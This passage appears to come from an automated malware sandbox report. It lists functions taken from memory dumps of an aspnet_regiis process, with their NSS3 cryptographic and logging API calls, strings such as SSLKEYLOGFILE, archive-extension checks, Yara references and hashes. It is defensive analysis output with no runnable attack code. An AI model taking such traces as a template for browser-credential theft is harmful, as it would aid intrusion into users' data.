                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6CC16BF7), ref: 6CC16F54
                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6CC16BF7), ref: 6CC16FE0
                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6CC16BF7), ref: 6CC16FFD
                                                                                                                                                                              Strings
                                                                                                                                                                              • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6CC16FDB
                                                                                                                                                                              • SSLKEYLOGFILE, xrefs: 6CC16EB1
                                                                                                                                                                              • # SSL/TLS secrets log file, generated by NSS, xrefs: 6CC16EF7
                                                                                                                                                                              • NSS_SSL_CBC_RANDOM_IV, xrefs: 6CC16FF8
                                                                                                                                                                              • SSLFORCELOCKS, xrefs: 6CC16F2B
                                                                                                                                                                              • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6CC16F4F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                                                                                                                                              • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                                                                                                                                              • API String ID: 412497378-2352201381
                                                                                                                                                                              • Opcode ID: 6fea9c856e48ea3644522b437ee1acea009b8fd9f2a7628bc6f9e2d2eb7f0a46
                                                                                                                                                                              • Instruction ID: c6f08a274fe235ae1602b6292eae10597ccd8b7ed0abecd0dee6f51572998750
                                                                                                                                                                              • Opcode Fuzzy Hash: 6fea9c856e48ea3644522b437ee1acea009b8fd9f2a7628bc6f9e2d2eb7f0a46
                                                                                                                                                                              • Instruction Fuzzy Hash: 8CA1E6B2A5DDD086E750463FCC0139836B2BB8B329F9843A5E831C6ED5FB75A540B391
                                                                                                                                                                              Function 02A1B870 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 65stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrlen.KERNEL32(00000000,76F883C0,00000000,02A1C55B,?), ref: 02A1B875
                                                                                                                                                                              • StrCmpCA.SHLWAPI(76F883C0,02A3613C), ref: 02A1B8A3
                                                                                                                                                                              • StrCmpCA.SHLWAPI(76F883C0,.zip), ref: 02A1B8B3
                                                                                                                                                                              • StrCmpCA.SHLWAPI(76F883C0,.zoo), ref: 02A1B8BF
                                                                                                                                                                              • StrCmpCA.SHLWAPI(76F883C0,.arc), ref: 02A1B8CB
                                                                                                                                                                              • StrCmpCA.SHLWAPI(76F883C0,.lzh), ref: 02A1B8D7
                                                                                                                                                                              • StrCmpCA.SHLWAPI(76F883C0,.arj), ref: 02A1B8E3
                                                                                                                                                                              • StrCmpCA.SHLWAPI(76F883C0,.gz), ref: 02A1B8EF
                                                                                                                                                                              • StrCmpCA.SHLWAPI(76F883C0,.tgz), ref: 02A1B8FB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrlen
                                                                                                                                                                              • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                                                                                                                              • API String ID: 1659193697-51310709
                                                                                                                                                                              • Opcode ID: 4a0aa972c4ae241284676e5b80340e850ded1f4efca60aeb45d3d6646d22ef35
                                                                                                                                                                              • Instruction ID: ccb5457d4b42d0defc18b42a16db4ba2ae82474e9ecfdb89dfbb35d9bc6b37e9
                                                                                                                                                                              • Opcode Fuzzy Hash: 4a0aa972c4ae241284676e5b80340e850ded1f4efca60aeb45d3d6646d22ef35
                                                                                                                                                                              • Instruction Fuzzy Hash: 1C01212AB893667ABA232331DDC1E7F1F6C5F82DAC3080836F902A2048DF58954395B5
                                                                                                                                                                              Function 6CB88E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB88E5B
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE007,00000000), ref: 6CB88E81
                                                                                                                                                                              • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CB88EED
                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CCB18D0,?), ref: 6CB88F03
                                                                                                                                                                              • PR_CallOnce.NSS3(6CCE2AA4,6CBE12D0), ref: 6CB88F19
                                                                                                                                                                              • PL_FreeArenaPool.NSS3(?), ref: 6CB88F2B
                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CB88F53
                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CB88F65
                                                                                                                                                                              • PL_FinishArenaPool.NSS3(?), ref: 6CB88FA1
                                                                                                                                                                              • SECITEM_DupItem_Util.NSS3(?), ref: 6CB88FFE
                                                                                                                                                                              • PR_CallOnce.NSS3(6CCE2AA4,6CBE12D0), ref: 6CB89012
                                                                                                                                                                              • PL_FreeArenaPool.NSS3(?), ref: 6CB89024
                                                                                                                                                                              • PL_FinishArenaPool.NSS3(?), ref: 6CB8902C
                                                                                                                                                                              • PORT_DestroyCheapArena.NSS3(?), ref: 6CB8903E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
                                                                                                                                                                              • String ID: security
                                                                                                                                                                              • API String ID: 3512696800-3315324353
                                                                                                                                                                              • Opcode ID: 3d2486eac0dbcd2a2ca179a7b588227449a144da0a91809c1a5618ea7b0d922c
                                                                                                                                                                              • Instruction ID: 480bedc1b14089d3a7c73c80046238b7da26ad2a03b5436045aa27cdefea399b
                                                                                                                                                                              • Opcode Fuzzy Hash: 3d2486eac0dbcd2a2ca179a7b588227449a144da0a91809c1a5618ea7b0d922c
                                                                                                                                                                              • Instruction Fuzzy Hash: 6E5139B1509380ABEB109B58DC41FAF77A8EB8979CF54082EF94597B40E732D908C763
                                                                                                                                                                              Function 02A139C2 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExitProcessstrtok_s
                                                                                                                                                                              • String ID: block
                                                                                                                                                                              • API String ID: 3407564107-2199623458
                                                                                                                                                                              • Opcode ID: 237de9e8610e097c566dd92bce87b58d9997300fc49729bb2ef29c268d506267
                                                                                                                                                                              • Instruction ID: 24eef4ad009d30341eb5831e059b1be4d30ac96b2b0f17556e6e579c0e33bffc
                                                                                                                                                                              • Opcode Fuzzy Hash: 237de9e8610e097c566dd92bce87b58d9997300fc49729bb2ef29c268d506267
                                                                                                                                                                              • Instruction Fuzzy Hash: EE411F70A88315BBFF406F70A899E697B7CFB18A5671096A5F607E2040FF30E255CB94
                                                                                                                                                                              Function 6CBB4E60 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 127COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6CBB4E83
                                                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CBB4EB8
                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CBB4EC7
                                                                                                                                                                                • Part of subcall function 6CC9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC9D963
                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6CBB4EDD
                                                                                                                                                                              • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CBB4F0B
                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CBB4F1A
                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6CBB4F30
                                                                                                                                                                              • PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6CBB4F4F
                                                                                                                                                                              • PR_LogPrint.NSS3( ulCount = %d,?), ref: 6CBB4F68
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                              • String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue
                                                                                                                                                                              • API String ID: 1003633598-3530272145
                                                                                                                                                                              • Opcode ID: 2c869dbf03348889ffcfc9a6d70a1594d177d093c919bc71ce4a5767e94c9522
                                                                                                                                                                              • Instruction ID: 4464fc6e14787a8e2ca62e4ed7c99f5d432ffa169e6b7986581cda0da06b2bee
                                                                                                                                                                              • Opcode Fuzzy Hash: 2c869dbf03348889ffcfc9a6d70a1594d177d093c919bc71ce4a5767e94c9522
                                                                                                                                                                              • Instruction Fuzzy Hash: 5D41C231601185ABDB04DB54DD58FAE77B5EB4730DF058024F408A7A11EF349E49CFA2
                                                                                                                                                                              Function 6CBB4CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6CBB4CF3
                                                                                                                                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CBB4D28
                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CBB4D37
                                                                                                                                                                                • Part of subcall function 6CC9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC9D963
                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6CBB4D4D
                                                                                                                                                                              • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CBB4D7B
                                                                                                                                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CBB4D8A
                                                                                                                                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6CBB4DA0
                                                                                                                                                                              • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6CBB4DBC
                                                                                                                                                                              • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6CBB4E20
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                              • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
                                                                                                                                                                              • API String ID: 1003633598-3553622718
                                                                                                                                                                              • Opcode ID: a7645886414e104e2926d57dd687c2c2af1d5939c78760d3f6a795fa6dea6a72
                                                                                                                                                                              • Instruction ID: fa7317f312bf57b1cd53371004aa184a4852ebb3543561fc0046b7588916a4d5
                                                                                                                                                                              • Opcode Fuzzy Hash: a7645886414e104e2926d57dd687c2c2af1d5939c78760d3f6a795fa6dea6a72
                                                                                                                                                                              • Instruction Fuzzy Hash: E0410130600195AFDB449B50DD98BAE37B5FB4A30EF048425F808BBA11EF349D49CFA2
                                                                                                                                                                              Function 6CBE6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SEC_ASN1DecodeItem_Util.NSS3(?,?,6CCB1DE0,?), ref: 6CBE6CFE
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBE6D26
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CBE6D70
                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000480), ref: 6CBE6D82
                                                                                                                                                                              • DER_GetInteger_Util.NSS3(?), ref: 6CBE6DA2
                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CBE6DD8
                                                                                                                                                                              • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CBE6E60
                                                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CBE6F19
                                                                                                                                                                              • PK11_DigestBegin.NSS3(00000000), ref: 6CBE6F2D
                                                                                                                                                                              • PK11_DigestOp.NSS3(?,?,00000000), ref: 6CBE6F7B
                                                                                                                                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CBE7011
                                                                                                                                                                              • PK11_FreeSymKey.NSS3(00000000), ref: 6CBE7033
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBE703F
                                                                                                                                                                              • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CBE7060
                                                                                                                                                                              • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CBE7087
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE062,00000000), ref: 6CBE70AF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2108637330-0
                                                                                                                                                                              • Opcode ID: 2652eac30a2e495cb0efa91e5cd82534e0e96d044b897083b037352cfe5b44cf
                                                                                                                                                                              • Instruction ID: e9d0ecd5c3368b7222379cb94cc3f6cc3cbe5aed1082911533c5b872d8f7b8b9
                                                                                                                                                                              • Opcode Fuzzy Hash: 2652eac30a2e495cb0efa91e5cd82534e0e96d044b897083b037352cfe5b44cf
                                                                                                                                                                              • Instruction Fuzzy Hash: C0A129719082C49BEB008B24DC45B6B32A4DB89B8CF248939EA59DBB81E775D845C793
                                                                                                                                                                              Function 6CBAAEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,6CB8AB95,00000000,?,00000000,00000000,00000000), ref: 6CBAAF25
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,6CB8AB95,00000000,?,00000000,00000000,00000000), ref: 6CBAAF39
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,6CB8AB95,00000000,?,00000000,00000000,00000000), ref: 6CBAAF51
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6CB8AB95,00000000,?,00000000,00000000,00000000), ref: 6CBAAF69
                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CBAB06B
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CBAB083
                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CBAB0A4
                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CBAB0C1
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000), ref: 6CBAB0D9
                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CBAB102
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBAB151
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBAB182
                                                                                                                                                                                • Part of subcall function 6CBDFAB0: free.MOZGLUE(?,-00000001,?,?,6CB7F673,00000000,00000000), ref: 6CBDFAC7
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CBAB177
                                                                                                                                                                                • Part of subcall function 6CC2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC2C2BF
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6CB8AB95,00000000,?,00000000,00000000,00000000), ref: 6CBAB1A2
                                                                                                                                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,6CB8AB95,00000000,?,00000000,00000000,00000000), ref: 6CBAB1AA
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6CB8AB95,00000000,?,00000000,00000000,00000000), ref: 6CBAB1C2
                                                                                                                                                                                • Part of subcall function 6CBD1560: TlsGetValue.KERNEL32(00000000,?,6CBA0844,?), ref: 6CBD157A
                                                                                                                                                                                • Part of subcall function 6CBD1560: EnterCriticalSection.KERNEL32(?,?,?,6CBA0844,?), ref: 6CBD158F
                                                                                                                                                                                • Part of subcall function 6CBD1560: PR_Unlock.NSS3(?,?,?,?,6CBA0844,?), ref: 6CBD15B2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4188828017-0
                                                                                                                                                                              • Opcode ID: c89b836a5e4fae082810e9e65b712b4c9c8a2ee5b511fb90fda9ab82ae30a12d
                                                                                                                                                                              • Instruction ID: 509ea8717d903ea5a689a9017ffa801290441cf4e4c830269399f893a6da9ee0
                                                                                                                                                                              • Opcode Fuzzy Hash: c89b836a5e4fae082810e9e65b712b4c9c8a2ee5b511fb90fda9ab82ae30a12d
                                                                                                                                                                              • Instruction Fuzzy Hash: B9A191B1D04249ABEF009FA4DC41BEEB7B4EF09308F144125E915A7751E731E95ACBE1
                                                                                                                                                                              Function 6CBBCE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000132), ref: 6CBBCE9E
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000321), ref: 6CBBCEBB
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00001081), ref: 6CBBCED8
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000551), ref: 6CBBCEF5
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000651), ref: 6CBBCF12
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000321), ref: 6CBBCF2F
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000121), ref: 6CBBCF4C
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000400), ref: 6CBBCF69
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000341), ref: 6CBBCF86
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000311), ref: 6CBBCFA3
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000301), ref: 6CBBCFBC
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000331), ref: 6CBBCFD5
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000101), ref: 6CBBCFEE
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00000141), ref: 6CBBD007
                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,00001008), ref: 6CBBD021
                                                                                                                                                                              Memory Dump Source
